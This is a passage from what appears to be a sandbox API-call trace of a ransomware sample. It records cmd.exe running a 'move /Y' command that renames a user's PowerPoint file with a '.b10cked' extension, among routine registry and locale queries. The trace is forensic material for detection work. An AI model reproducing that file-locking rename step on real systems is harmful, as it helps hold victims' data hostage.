returned 0x7d0 [0231.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7d0) returned 0x38 [0231.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.886] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.886] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f904 | out: phkResult=0x18f904*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x18f93b, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8d4, dwLength=0x1c | out: lpBuffer=0x18f8d4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.953] GetEnvironmentStringsW () returned 0x1e02b0* [0231.953] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.953] GetEnvironmentStringsW () returned 0x1e02b0* [0231.953] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.953] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e874 | out: phkResult=0x18e874*=0x40) returned 0x0 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x60, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x4) returned 0x0 [0231.953] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x0, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegCloseKey (hKey=0x40) returned 0x0 [0231.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e874 | out: phkResult=0x18e874*=0x40) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x40, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x1, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x0, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x4, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x4) returned 0x0 [0231.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e87c, lpData=0x18e880, lpcbData=0x18e878*=0x1000 | out: lpType=0x18e87c*=0x0, lpData=0x18e880*=0x9, lpcbData=0x18e878*=0x1000) returned 0x2 [0231.954] RegCloseKey (hKey=0x40) returned 0x0 [0231.954] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.954] srand (_Seed=0x5b8863bf) [0231.954] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" [0231.954] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" [0231.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1a10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.955] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.955] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.955] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.955] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.955] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.955] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.956] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.956] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.956] GetEnvironmentStringsW () returned 0x1e2400* [0231.956] FreeEnvironmentStringsW (penv=0x1e2400) returned 1 [0231.956] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.956] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.956] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.956] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.956] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.956] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.956] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.956] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f640 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f640, lpFilePart=0x18f63c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f63c*="Desktop") returned 0x18 [0231.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3bc | out: lpFindFileData=0x18f3bc) returned 0x1e0a90 [0231.957] FindClose (in: hFindFile=0x1e0a90 | out: hFindFile=0x1e0a90) returned 1 [0231.957] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.958] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.958] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.958] GetEnvironmentStringsW () returned 0x1e02b0* [0231.958] FreeEnvironmentStringsW (penv=0x1e02b0) returned 1 [0231.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.958] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f780, cchData=128 | out: lpLCData="0") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f780, cchData=128 | out: lpLCData="0") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f780, cchData=128 | out: lpLCData="1") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.990] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.991] GetConsoleTitleW (in: lpConsoleTitle=0x1d0980, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.024] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.025] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.025] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.025] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.025] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.026] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.026] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.026] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.032] GetConsoleTitleW (in: lpConsoleTitle=0x18f478, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.085] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.085] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.085] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.085] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.086] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.086] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.086] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.086] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.086] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.086] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.086] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.086] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.086] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.088] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f234, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f22c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f22c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.091] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.091] _wcsicmp (_String1="IYDSDI~1.PPT", _String2=".") returned 59 [0232.091] _wcsicmp (_String1="IYDSDI~1.PPT", _String2="..") returned 59 [0232.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdi~1.ppt")) returned 0x20 [0232.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e2198 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.091] SetErrorMode (uMode=0x0) returned 0x0 [0232.092] SetErrorMode (uMode=0x1) returned 0x0 [0232.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", nBufferLength=0x104, lpBuffer=0x18ebbc, lpFilePart=0x18eba4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", lpFilePart=0x18eba4*="IYDSDI~1.PPT") returned 0x51 [0232.092] SetErrorMode (uMode=0x0) returned 0x1 [0232.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1")) returned 0x10 [0232.092] _wcsicmp (_String1="IYDSDI~1.PPT", _String2=".") returned 59 [0232.092] _wcsicmp (_String1="IYDSDI~1.PPT", _String2="..") returned 59 [0232.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdi~1.ppt")) returned 0x20 [0232.092] SetErrorMode (uMode=0x0) returned 0x0 [0232.092] SetErrorMode (uMode=0x1) returned 0x0 [0232.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", nBufferLength=0x104, lpBuffer=0x18f038, lpFilePart=0x18edd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", lpFilePart=0x18edd0*="IYDSDI~1.PPT") returned 0x51 [0232.092] SetErrorMode (uMode=0x0) returned 0x1 [0232.092] SetErrorMode (uMode=0x0) returned 0x0 [0232.093] SetErrorMode (uMode=0x1) returned 0x0 [0232.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x18f240, lpFilePart=0x18edd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", lpFilePart=0x18edd0*="iyDSdIsdd3hcv.pptx.b10cked") returned 0x5f [0232.093] SetErrorMode (uMode=0x0) returned 0x1 [0232.093] SetLastError (dwErrCode=0x0) [0232.093] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx.b10cked")) returned 0xffffffff [0232.093] GetLastError () returned 0x2 [0232.093] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x18e74c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e74c) returned 0x1e23a8 [0232.093] FindNextFileW (in: hFindFile=0x1e23a8, lpFindFileData=0x18e74c | out: lpFindFileData=0x18e74c) returned 0 [0232.094] GetLastError () returned 0x12 [0232.094] FindClose (in: hFindFile=0x1e23a8 | out: hFindFile=0x1e23a8) returned 1 [0232.096] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x1e1f38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1f38) returned 0x1d0f68 [0232.096] GetFullPathNameW (in: 